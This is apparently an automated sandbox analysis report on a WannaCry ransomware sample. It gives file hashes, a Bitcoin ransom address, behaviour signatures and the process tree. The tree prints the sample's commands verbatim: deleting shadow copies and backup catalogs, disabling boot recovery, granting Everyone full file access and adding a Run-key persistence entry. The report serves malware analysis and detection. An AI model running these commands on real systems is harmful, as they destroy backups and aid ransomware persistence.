Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
18-09-2021 20:19
Static task
static1
Behavioral task
behavioral1
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win7-en-20210916
Behavioral task
behavioral2
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win11
Behavioral task
behavioral3
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win10v20210408
General
-
Target
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
-
Size
3.4MB
-
MD5
84c82835a5d21bbcf75a61706d8ab549
-
SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
-
SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
-
SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\@[email protected]
wannacry
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 14 IoCs
pid Process 1248 taskdl.exe 1292 taskdl.exe 3732 @[email protected] 3992 @[email protected] 3736 taskhsvc.exe 1496 taskse.exe 4044 @[email protected] 4084 taskdl.exe 2836 taskdl.exe 924 taskse.exe 2092 @[email protected] 1524 taskse.exe 1848 @[email protected] 876 taskdl.exe -
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\SkipStop.raw.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Pictures\SkipStop.raw.WNCRYT => C:\Users\Admin\Pictures\SkipStop.raw.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\SkipStop.raw.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD5A99.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD5AB0.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Loads dropped DLL 6 IoCs
pid Process 3736 taskhsvc.exe 3736 taskhsvc.exe 3736 taskhsvc.exe 3736 taskhsvc.exe 3736 taskhsvc.exe 3736 taskhsvc.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 596 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\brtxwnpzjg866 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" reg.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1348 vssadmin.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2016 reg.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3736 taskhsvc.exe 3736 taskhsvc.exe 3736 taskhsvc.exe 3736 taskhsvc.exe 3736 taskhsvc.exe 3736 taskhsvc.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeTcbPrivilege 1496 taskse.exe Token: SeTcbPrivilege 1496 taskse.exe Token: SeBackupPrivilege 688 vssvc.exe Token: SeRestorePrivilege 688 vssvc.exe Token: SeAuditPrivilege 688 vssvc.exe Token: SeIncreaseQuotaPrivilege 876 WMIC.exe Token: SeSecurityPrivilege 876 WMIC.exe Token: SeTakeOwnershipPrivilege 876 WMIC.exe Token: SeLoadDriverPrivilege 876 WMIC.exe Token: SeSystemProfilePrivilege 876 WMIC.exe Token: SeSystemtimePrivilege 876 WMIC.exe Token: SeProfSingleProcessPrivilege 876 WMIC.exe Token: SeIncBasePriorityPrivilege 876 WMIC.exe Token: SeCreatePagefilePrivilege 876 WMIC.exe Token: SeBackupPrivilege 876 WMIC.exe Token: SeRestorePrivilege 876 WMIC.exe Token: SeShutdownPrivilege 876 WMIC.exe Token: SeDebugPrivilege 876 WMIC.exe Token: SeSystemEnvironmentPrivilege 876 WMIC.exe Token: SeRemoteShutdownPrivilege 876 WMIC.exe Token: SeUndockPrivilege 876 WMIC.exe Token: SeManageVolumePrivilege 876 WMIC.exe Token: 33 876 WMIC.exe Token: 34 876 WMIC.exe Token: 35 876 WMIC.exe Token: 36 876 WMIC.exe Token: SeIncreaseQuotaPrivilege 876 WMIC.exe Token: SeSecurityPrivilege 876 WMIC.exe Token: SeTakeOwnershipPrivilege 876 WMIC.exe Token: SeLoadDriverPrivilege 876 WMIC.exe Token: SeSystemProfilePrivilege 876 WMIC.exe Token: SeSystemtimePrivilege 876 WMIC.exe Token: SeProfSingleProcessPrivilege 876 WMIC.exe Token: SeIncBasePriorityPrivilege 876 WMIC.exe Token: SeCreatePagefilePrivilege 876 WMIC.exe Token: SeBackupPrivilege 876 WMIC.exe Token: SeRestorePrivilege 876 WMIC.exe Token: SeShutdownPrivilege 876 WMIC.exe Token: SeDebugPrivilege 876 WMIC.exe Token: SeSystemEnvironmentPrivilege 876 WMIC.exe Token: SeRemoteShutdownPrivilege 876 WMIC.exe Token: SeUndockPrivilege 876 WMIC.exe Token: SeManageVolumePrivilege 876 WMIC.exe Token: 33 876 WMIC.exe Token: 34 876 WMIC.exe Token: 35 876 WMIC.exe Token: 36 876 WMIC.exe Token: SeTcbPrivilege 924 taskse.exe Token: SeTcbPrivilege 924 taskse.exe Token: SeTcbPrivilege 1524 taskse.exe Token: SeTcbPrivilege 1524 taskse.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3732 @[email protected] 3992 @[email protected] 3992 @[email protected] 3732 @[email protected] 4044 @[email protected] 4044 @[email protected] 2092 @[email protected] 1848 @[email protected] -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1832 wrote to memory of 1840 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 68 PID 1832 wrote to memory of 1840 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 68 PID 1832 wrote to memory of 1840 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 68 PID 1832 wrote to memory of 596 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 69 PID 1832 wrote to memory of 596 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 69 PID 1832 wrote to memory of 596 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 69 PID 1832 wrote to memory of 1248 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 72 PID 1832 wrote to memory of 1248 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 72 PID 1832 wrote to memory of 1248 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 72 PID 1832 wrote to memory of 1380 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 73 PID 1832 wrote to memory of 1380 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 73 PID 1832 wrote to memory of 1380 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 73 PID 1380 wrote to memory of 1592 1380 cmd.exe 75 PID 1380 wrote to memory of 1592 1380 cmd.exe 75 PID 1380 wrote to memory of 1592 1380 cmd.exe 75 PID 1832 wrote to memory of 1292 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 78 PID 1832 wrote to memory of 1292 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 78 PID 1832 wrote to memory of 1292 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 78 PID 1832 wrote to memory of 3732 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 81 PID 1832 wrote to memory of 3732 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 81 PID 1832 wrote to memory of 3732 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 81 PID 1832 wrote to memory of 2836 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 82 PID 1832 wrote to memory of 2836 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 82 PID 1832 wrote to memory of 2836 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 82 PID 2836 wrote to memory of 3992 2836 cmd.exe 85 PID 2836 wrote to memory of 3992 2836 cmd.exe 85 PID 2836 wrote to memory of 3992 2836 cmd.exe 85 PID 3732 wrote to memory of 3736 3732 @[email protected] 87 PID 3732 wrote to memory of 3736 3732 @[email protected] 87 PID 3732 wrote to memory of 3736 3732 @[email protected] 87 PID 3992 wrote to memory of 3924 3992 @[email protected] 91 PID 3992 wrote to memory of 3924 3992 @[email protected] 91 PID 3992 wrote to memory of 3924 3992 @[email protected] 91 PID 1832 wrote to memory of 1496 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 93 PID 1832 wrote to memory of 1496 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 93 PID 1832 wrote to memory of 1496 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 93 PID 1832 wrote to memory of 4044 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 96 PID 1832 wrote to memory of 4044 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 96 PID 1832 wrote to memory of 4044 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 96 PID 3924 wrote to memory of 1348 3924 cmd.exe 94 PID 3924 wrote to memory of 1348 3924 cmd.exe 94 PID 3924 wrote to memory of 1348 3924 cmd.exe 94 PID 1832 wrote to memory of 4056 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 95 PID 1832 wrote to memory of 4056 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 95 PID 1832 wrote to memory of 4056 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 95 PID 1832 wrote to memory of 4084 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 98 PID 1832 wrote to memory of 4084 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 98 PID 1832 wrote to memory of 4084 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 98 PID 4056 wrote to memory of 2016 4056 cmd.exe 99 PID 4056 wrote to memory of 2016 4056 cmd.exe 99 PID 4056 wrote to memory of 2016 4056 cmd.exe 99 PID 3924 wrote to memory of 876 3924 cmd.exe 101 PID 3924 wrote to memory of 876 3924 cmd.exe 101 PID 3924 wrote to memory of 876 3924 cmd.exe 101 PID 1832 wrote to memory of 2836 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 105 PID 1832 wrote to memory of 2836 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 105 PID 1832 wrote to memory of 2836 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 105 PID 1832 wrote to memory of 924 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 106 PID 1832 wrote to memory of 924 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 106 PID 1832 wrote to memory of 924 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 106 PID 1832 wrote to memory of 2092 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 107 PID 1832 wrote to memory of 2092 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 107 PID 1832 wrote to memory of 2092 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 107 PID 1832 wrote to memory of 1524 1832 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 108 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1840 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:1840
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:596
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 219061632003608.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵PID:1592
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1292
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3736
-
-
-
C:\Windows\SysWOW64\cmd.exePID:2836
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:1348
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "brtxwnpzjg866" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "brtxwnpzjg866" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:4044
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4084
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2836
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:2092
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1848
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:876
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:688